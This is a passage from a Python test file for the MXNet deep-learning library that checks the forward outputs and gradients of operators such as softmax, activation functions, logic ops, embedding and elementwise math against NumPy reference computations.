grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
